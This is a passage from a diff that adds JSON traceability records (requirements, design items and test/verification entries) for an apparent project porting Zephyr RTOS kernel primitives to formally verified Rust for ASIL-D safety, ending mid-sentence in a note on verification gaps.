+      "description": "Unit tests in plain/src/sched.rs covering runq_add/remove/best, next_up selection, should_preempt logic, priority ordering, no-duplicate invariant, suspend/resume state transitions, yield reordering, cooperative/meta-IRQ preemption rules, and idle thread fallback.\n",
+      "id": "UV-SC-001",
+      "links": [
+        {
+          "target": "SWDD-SC-ADD",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SC-REMOVE-BEST",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SC-NEXT-UP",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SC-SHOULD-PREEMPT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SC-FSM",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Scheduler unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "When a thread has a non-zero per-thread slice, that value is returned. Otherwise the global slice_ticks is returned. Maps to timeslicing.c:25-37.\n",
+      "id": "SWREQ-TS-TS01",
+      "links": [
+        {
+          "target": "SYSREQ-TS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "config",
+        "asil-d"
+      ],
+      "title": "TS1: slice_time returns per-thread slice or global default",
+      "type": "sw-req"
+    },
+    {
+      "description": "When try_lock is called by the current owner, lock_count is incremented. The owner remains the same. Maps to z_impl_k_mutex_lock line 129 in kernel/mutex.c.\n",
+      "id": "SWREQ-MUT-M04",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MUT-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "lock",
+        "reentrant",
+        "asil-d"
+      ],
+      "title": "M4: try_lock by same owner increments lock_count (reentrant)",
+      "type": "sw-req"
+    },
+    {
+      "description": "For an active timeout, expires returns the absolute tick at which the timeout fires. For an inactive timeout, returns 0. Maps to timeout.c:196-209.\n",
+      "id": "SWREQ-TO-TO04",
+      "links": [
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "expires",
+        "asil-d"
+      ],
+      "title": "TO4: timeout_expires returns absolute expiry tick",
+      "type": "sw-req"
+    },
+    {
+      "description": "Set used = 0 and set FLAG_RESET bit in flags, signaling to pending readers/writers that the pipe is being reset.\n",
+      "id": "SWDD-PP-RESET",
+      "links": [
+        {
+          "target": "SWARCH-PP-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-PP-PP09",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-PP-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "reset"
+      ],
+      "title": "Pipe::reset — z_impl_k_pipe_reset port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "No arithmetic operation on the woken counter causes integer overflow. All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-FX-FX06",
+      "links": [
+        {
+          "target": "SYSREQ-FX-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "futex",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "FX6: no overflow in woken count",
+      "type": "sw-req"
+    },
+    {
+      "description": "When init_check is MustBeInit, validation fails with EINVAL if the INITIALIZED flag is not set.\n",
+      "id": "SWREQ-US-US07",
+      "links": [
+        {
+          "target": "SYSREQ-US-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "init-check",
+        "asil-d"
+      ],
+      "title": "US7: K_OBJ_FLAG_INITIALIZED required for access (MustBeInit)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Priority-based scheduler model with run queue management, preemption decisions, and thread state machine. Tracks priority queue, thread states (READY/RUNNING/SUSPENDED/PENDING/HALTED), and preemption logic. Actual context switching, spinlocks, and SMP coordination stays in C — Gale verifies priority ordering, state transitions, and preemption correctness only. No unsafe code.\n",
+      "id": "SWARCH-SC-001",
+      "links": [
+        {
+          "target": "SWREQ-SC-SC01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-SC-SC04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-SC-SC05",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-SC-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "architecture"
+      ],
+      "title": "Scheduler module (gale::sched)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Unit tests in src/ring_buf.rs covering init (valid/zero), put (normal/full), get (normal/empty), put_n/get_n (partial), peek_at (valid/invalid), reset, size_get, space_get, capacity_get, is_empty, is_full, and head/tail consistency.\n",
+      "id": "UV-RB-001",
+      "links": [
+        {
+          "target": "SWDD-RB-PUT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-RB-GET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "RingBuf unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "A FIFO queue that matches the Zephyr k_fifo API semantics: initialization, put (enqueue at tail), and get (dequeue from head). Built on top of k_queue. Must maintain item count bounds and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-FI-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-FI",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "kernel"
+      ],
+      "title": "FIFO queue with put/get semantics",
+      "type": "system-req"
+    },
+    {
+      "description": "Broadcast clears the wait queue entirely and returns the number of threads woken, equal to the previous queue length. Maps to condvar.c:73-96.\n",
+      "id": "SWREQ-CV-C04",
+      "links": [
+        {
+          "target": "SYSREQ-CV-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-CV-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "broadcast",
+        "asil-d"
+      ],
+      "title": "C4: broadcast wakes all waiters, returns woken count",
+      "type": "sw-req"
+    },
+    {
+      "description": "Diagnostic and monitoring subsystems (thread_monitor, usage statistics, obj_core, spinlock_validate) shall be excluded from the Gale-verified kernel path.  These subsystems are optional and not required for safety-critical operation.\n",
+      "id": "SYSREQ-MON-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "monitoring",
+        "scope",
+        "exclusion"
+      ],
+      "title": "Monitoring subsystems excluded from safety path",
+      "type": "system-req"
+    },
+    {
+      "description": "If count > 0: decrement and return true (acquired immediately). Else: block thread, insert into wait queue in priority order, return false. C source: kernel/sem.c line 158 (z_pend_curr path).\n",
+      "id": "SWDD-SEM-TAKE-BLOCKING",
+      "links": [
+        {
+          "target": "SWARCH-SEM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SEM-P07",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SEM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "take",
+        "blocking"
+      ],
+      "title": "Semaphore::take_blocking — z_impl_k_sem_take (with timeout) port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Integration tests in tests/timer_integration.rs exercising the full timer API surface across module boundaries. Tests init validation, start/stop lifecycle, expire sequences, status_get read-and-reset, one-shot vs periodic modes, overflow protection, and stress cycles.\n",
+      "id": "IV-TM-001",
+      "links": [
+        {
+          "target": "SWARCH-TM-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Timer integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "A user-mode thread can only access a kernel object if its permission bit is set in the object's bitmask.\n",
+      "id": "SWREQ-US-US01",
+      "links": [
+        {
+          "target": "SYSREQ-US-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "access",
+        "asil-d"
+      ],
+      "title": "US1: object access requires permission bit set for calling thread",
+      "type": "sw-req"
+    },
+    {
+      "description": "The top-level goal G-1 is decomposed into four sub-goals covering: arithmetic safety (G-2), state machine correctness (G-3), deadlock freedom (G-4), and semantic equivalence with the Zephyr C reference (G-5).  Each sub-goal is supported by a different verification track, and the STPA analysis (C-1, C-2) bounds the operational context.\n",
+      "id": "S-1",
+      "links": [
+        {
+          "target": "G-1",
+          "type": "decomposes"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "safety",
+        "asil-d",
+        "strategy"
+      ],
+      "title": "Argue safety via formal verification, dynamic testing, and STPA",
+      "type": "safety-strategy"
+    },
+    {
+      "description": "Property-based tests in tests/proptest_stack.rs exercising init parameter validation, push-pop roundtrip, conservation after arbitrary operations, error code correctness, and fill-drain symmetry.\n",
+      "id": "UV-SK-002",
+      "links": [
+        {
+          "target": "SWDD-SK-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SK-PUSH",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SK-POP",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "proptest",
+        "swe-4"
+      ],
+      "title": "Stack property-based tests (proptest)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The Zephyr RTOS shall invoke a user-provided expiry function in ISR context each time the timer expires, and an optional stop function when the timer is stopped.\n",
+      "id": "ZEP-SRS-TM-3",
+      "links": [
+        {
+          "target": "ZEP-SYRS-TM",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "timer"
+      ],
+      "title": "Zephyr: Timer Expiry Callback",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Integration tests in tests/lifo_integration.rs exercising the full LIFO API surface across module boundaries. Tests init, put/get sequences, empty-get error path, roundtrip, interleaved operations, and stress cycles.\n",
+      "id": "IV-LI-001",
+      "links": [
+        {
+          "target": "SWARCH-LI-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "LIFO integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "No arithmetic operation on the item count causes integer overflow. All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-FI-FI06",
+      "links": [
+        {
+          "target": "SYSREQ-FI-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "FI6: no arithmetic overflow in any operation",
+      "type": "sw-req"
+    },
+    {
+      "description": "Create thread with stack, entry, args, priority, options. Delegate to setup_new_thread, then start or schedule delayed start. C source: kernel/thread.c lines 785-807.\n",
+      "id": "SWDD-TL-CREATE",
+      "links": [
+        {
+          "target": "SWARCH-TL-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TL-TH01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TL-TH06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TL-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "create"
+      ],
+      "title": "ThreadLifecycle::create — z_impl_k_thread_create port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Unit tests in plain/src/pipe.rs covering init validation, write/read basic operations, clamping to free space/available data, full/empty/closed/resetting error paths, reset empties pipe, close clears flags, conservation invariant, zero-length rejection, and streaming write-read cycles.\n",
+      "id": "UV-PP-001",
+      "links": [
+        {
+          "target": "SWDD-PP-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-WRITE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-READ",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-CLOSE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-RESET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Pipe unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Kernel infrastructure modules with no safety-critical logic (banner, version, errno, float context, busy_wait, boot_args, compiler_stack_protect, irq_offload, sys_clock, main_weak, nothread) shall be left as upstream Zephyr C.  These modules contain no state machine logic, no arithmetic that could overflow, and no synchronization — they are pure infrastructure.\n",
+      "id": "SYSREQ-TRIV-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "trivial",
+        "scope",
+        "exclusion"
+      ],
+      "title": "Trivial infrastructure modules left as upstream C",
+      "type": "system-req"
+    },
+    {
+      "description": "Both message size and maximum count are always strictly positive. Enforced by init rejecting zero values with -EINVAL. Maps to msg_q.c:43-71.\n",
+      "id": "SWREQ-MQ-MQ04",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MQ-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MQ4: msg_size > 0, max_msgs > 0 (always)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Initialize an empty FIFO. Set count = 0.\n",
+      "id": "SWDD-FI-INIT",
+      "links": [
+        {
+          "target": "SWARCH-FI-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-FI-FI01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "init"
+      ],
+      "title": "Fifo::init — k_fifo_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Dequeue an item from the head. If count > 0: decrement count, return OK. Otherwise return ENOENT.\n",
+      "id": "SWDD-FI-GET",
+      "links": [
+        {
+          "target": "SWARCH-FI-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-FI-FI03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-FI-FI04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-FI-FI06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "get"
+      ],
+      "title": "Fifo::get — k_fifo_get port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "No two active partitions in a memory domain have overlapping address ranges. The non-overlap invariant is maintained by check_add_partition validation.\n",
+      "id": "SWREQ-MD-MD01",
+      "links": [
+        {
+          "target": "SYSREQ-MD-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-domain",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MD1: partitions don't overlap (no address collision)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The system shall implement a stack synchronization primitive for LIFO exchange of word-sized values between threads.\n",
+      "id": "ZEP-SYRS-SK",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "stack"
+      ],
+      "title": "Zephyr: Stack",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Unit tests in plain/src/mem_slab.rs covering init validation, alloc/free operations, full/empty boundary conditions, alloc-free roundtrip, fill-drain cycles, conservation invariant, and capacity-one edge case.\n",
+      "id": "UV-MS-001",
+      "links": [
+        {
+          "target": "SWDD-MS-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MS-ALLOC",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MS-FREE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "MemSlab unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all mem_slab code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-MS-003",
+      "links": [
+        {
+          "target": "SWREQ-MS-MS01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "MemSlab Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all msgq code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-MQ-003",
+      "links": [
+        {
+          "target": "SWREQ-MQ-MQ01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "MsgQ Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When take is called with a timeout and count == 0, the calling thread is blocked and inserted into the wait queue in priority order. Maps to z_impl_k_sem_take line 158 (z_pend_curr) in kernel/sem.c.\n",
+      "id": "SWREQ-SEM-P07",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-5-8",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-5-9",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-5-10",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "take",
+        "blocking",
+        "asil-d"
+      ],
+      "title": "P7: take when count == 0, with wait, blocks calling thread",
+      "type": "sw-req"
+    },
+    {
+      "description": "Stripping all Verus source files (src/*.rs) with verus-strip produces plain Rust output (plain/src/*.rs) that compiles and passes all integration, proptest, and cargo tests. Validates REQ-TRACTOR-002 (automated mirror generation) at the system level.\n",
+      "id": "SV-TRACTOR-001",
+      "links": [
+        {
+          "target": "SYSREQ-TRACTOR-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "verus-strip",
+        "tractor",
+        "sys-5"
+      ],
+      "title": "verus-strip full codebase convergence",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Unit tests in src/heap.rs covering init validation, alloc/free roundtrip, double-free rejection, aligned allocation, split/merge identity, realloc shrink/grow, coalesce, capacity checks, and bytes_to_chunks overflow safety.\n",
+      "id": "UV-HP-001",
+      "links": [
+        {
+          "target": "SWDD-HP-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-HP-ALLOC",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-HP-FREE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Heap unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Verus specifications in src/dynamic.rs with requires/ensures clauses that formally verify dynamic pool properties (DY1-DY4) via SMT solving. Proves alloc/free correctness, can_serve logic, and capacity invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-DY-001",
+      "links": [
+        {
+          "target": "SWREQ-DY-DY01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-DY-DY02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-DY-DY03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-DY-DY04",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Dynamic Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Zephyr timeout subsystem integration tests executed on qemu_cortex_m3. The timeout subsystem is validated as part of the broader kernel test suite, confirming that deadline tracking and tick arithmetic operate correctly with Gale primitives. Test suite: zephyr/tests/kernel/context.\n",
+      "id": "SV-TO-001",
+      "links": [
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Timeout Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Full Zephyr kernel poll test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_POLL=y. Tests exercise the complete k_poll API through the Gale FFI/C shim layer, validating multi-object monitoring and signal delivery. Test suite: zephyr/tests/kernel/poll.\n",
+      "id": "SV-PL-001",
+      "links": [
+        {
+          "target": "SYSREQ-PL-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Poll Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Spinlock ownership and nesting discipline model with init/acquire/ acquire_nested/release. Tracks owner identity, nesting depth, and IRQ state. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-SL-001",
+      "links": [
+        {
+          "target": "SWREQ-SL-SL01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-SL-SL02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-SL-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "spinlock",
+        "architecture"
+      ],
+      "title": "Spinlock module (gale::spinlock)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "No arithmetic operation on lock_count causes integer overflow. The Verus code requires lock_count < u32::MAX as precondition. The plain code uses checked_add.\n",
+      "id": "SWREQ-MUT-M10",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "M10: no arithmetic overflow in lock_count",
+      "type": "sw-req"
+    },
+    {
+      "description": "The used byte count is always between 0 and size inclusive. This is the fundamental invariant maintained across all operations. Maps to pipe.c:67-296.\n",
+      "id": "SWREQ-PP-PP01",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PP-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "PP1: 0 <= used <= size (capacity invariant)",
+      "type": "sw-req"
+    },
+    {
+      "description": "When initializing a counting semaphore, where the maximum permitted count of a semaphore is invalid, then the Zephyr RTOS shall return an error indicating invalid values.\n",
+      "id": "ZEP-SRS-5-18",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore Initialization Option Validation",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Generic queue item counter model. Tracks item count for append/prepend/get validation. Supports both FIFO (append+get) and LIFO (prepend+get) ordering. Actual linked-list data management stays in C — Gale verifies counter safety only. No unsafe code.\n",
+      "id": "SWARCH-QU-001",
+      "links": [
+        {
+          "target": "SWREQ-QU-QU01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-QU-QU02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-QU-QU04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "architecture"
+      ],
+      "title": "Queue module (gale::queue)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Full Zephyr kernel semaphore test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_SEM=y. Tests exercise the complete k_sem API through the Gale FFI/C shim layer, validating functional equivalence with upstream Zephyr. Test suite: zephyr/tests/kernel/semaphore/semaphore.\n",
+      "id": "SV-SEM-001",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Semaphore Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "A work item that is being canceled cannot be resubmitted. Submit returns EBUSY and state is unchanged.\n",
+      "id": "SWREQ-WK-WK03",
+      "links": [
+        {
+          "target": "SYSREQ-WK-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "work",
+        "cancel",
+        "asil-d"
+      ],
+      "title": "WK3: submit while CANCELING returns EBUSY",
+      "type": "sw-req"
+    },
+    {
+      "description": "Integration tests exercising acquire-release roundtrips, nested acquire sequences, and cross-module spinlock interactions.\n",
+      "id": "IV-SL-001",
+      "links": [
+        {
+          "target": "SWARCH-SL-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Spinlock integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "When give is called and the wait queue is empty: if count < limit, count increments by 1 (GiveResult::Incremented). If count == limit, count is unchanged (GiveResult::Saturated). Maps to z_impl_k_sem_give lines 109-111 in kernel/sem.c.\n",
+      "id": "SWREQ-SEM-P03",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-5-12",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-5-13",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "give",
+        "asil-d"
+      ],
+      "title": "P3: give with no waiters increments count, capped at limit",
+      "type": "sw-req"
+    },
+    {
+      "description": "When the timer period is greater than zero, the timer operates in periodic mode and auto-restarts after each expiration.\n",
+      "id": "SWREQ-TM-TM07",
+      "links": [
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TM-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "periodic",
+        "asil-d"
+      ],
+      "title": "TM7: period>0 means periodic",
+      "type": "sw-req"
+    },
+    {
+      "description": "Replace Zephyr kernel synchronization primitives (sem.c, mutex.c, etc.) with formally verified Rust implementations that preserve identical functional behavior while proving safety properties to ASIL-D level via SMT solving (Verus) and theorem proving (Rocq).\n",
+      "id": "STKH-001",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "formal-verification"
+      ],
+      "title": "Formally verified kernel primitives for ASIL-D",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's software-based atomic operations. Contains atomic_get, z_impl_atomic_set, z_impl_atomic_add, z_impl_atomic_sub, z_impl_atomic_or, z_impl_atomic_and, z_impl_atomic_xor, z_impl_atomic_nand, z_impl_atomic_cas. The Gale port models value transformation semantics only — spinlock-based atomicity stays in C.\n",
+      "id": "PROV-AT-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "atomic",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/atomic_c.c — software atomic operations",
+      "type": "source-provenance"
+    },
+    {
+      "description": "No arithmetic operation on slice tick values, priority comparisons, or timeout computations causes integer overflow. All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-TS-TS06",
+      "links": [
+        {
+          "target": "SYSREQ-TS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "TS6: no overflow in slice tick arithmetic",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a FIFO queue that wraps k_queue, enqueuing items at the tail and dequeuing from the head in first-in first-out order.\n",
+      "id": "ZEP-SRS-FI-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-FI",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-FI-FI01",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-FI-FI02",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "fifo"
+      ],
+      "title": "Zephyr: FIFO Queue Wrapper",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The original Zephyr kernel C code (sem.c, mutex.c, etc.) has no formal verification. It is tested (unit tests, Zephyr test framework, IEC 61508 SIL 3 certification tests) but correctness is not machine-proven.\nThis creates three gaps for Gale:\n1. **No formal C spec**: Zephyr's requirements (reqmgmt/) are natural\n   language. Our Verus specs are the first formal specifications of\n   these primitives. We derived them by reading C code, not from a\n   pre-existing formal spec.\n\n2. **No mechanized C↔Rust equivalence**: We prove properties of the\n   Rust code, but cannot mechanically prove our Rust matches the C\n   behavior. The correspondence is established by:\n   - Code review (C source mapped in comments)\n   - Running Zephyr's own test suite against our implementation\n   - Structural similarity between C and Rust code\n   But none of these are formal proofs.\n\n3. **Latent C bugs may be replicated**: If the C code has a bug that\n   passes Zephyr's test suite, we might faithfully replicate it in Rust\n   and then \"prove\" the buggy behavior correct. Our formal specs could\n   be wrong if the C code we derived them from is wrong.\n\nMitigation: Our Verus specs are independent safety properties (e.g., \"count never exceeds limit\") that are correct regardless of the C code. They aren't derived from C behavior — they're derived from the mathematical 